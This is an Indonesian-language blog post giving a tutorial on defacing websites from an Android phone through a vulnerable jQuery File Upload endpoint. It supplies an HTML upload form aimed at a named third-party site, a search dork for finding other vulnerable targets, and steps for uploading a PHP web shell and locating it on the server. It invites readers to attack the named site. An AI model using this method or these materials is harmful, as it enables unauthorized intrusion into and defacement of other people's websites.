Showing posts with label Exploit. Show all posts
Deface With Exploit Jquery File Upload On Android
Yo kali ini saya akan membagikan tutorial biasa
sebenarnya hanya beda sedikit metode saja
jika biasanya dari pc/laptop kini menggunakan android
yo langsung saja
Bahan :
Notepad ( Bisa Cari Di PlayStore )
Shell
CSRF
<form method="POST" action="http://www.urimalo.com/assets/js/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Dork :
inurl:plugins/jquery-file-upload/server/php
saya sediakan site vuln kalo mau coba silakan dicoba tapi kalo bisa jangan diacak acak ya kasian yang mau nyoba
ini tampilannya
selanjutnya buka notepad lalu masukan csrfnya di notepad dan save.html
lalu buka tempat kalian menyimpan file
lalu buka sesuai broswer yang kalian gunakan
lalu lanjutkan stepnya seperti biasa
upload shell
lalu liat tempat directori shellnya biasanya di bla.com/blablabla/server/php/files/namashell.php
sekian tutorial kecil dari saya
mungkin biasa saja atau sama saja dengan yang lain
tapi setidaknya tutorial ini membagikan bahwa dengan android juga mereka bisa melakukan kejailan mereka :D
mungkin kecil
tapi akan aneh jika anda bisa melakukan hal BESAR tapi tidak bisa melakukan hal KECIL
./Salam SiPengembara Gila
Subscribe to:
Posts (Atom)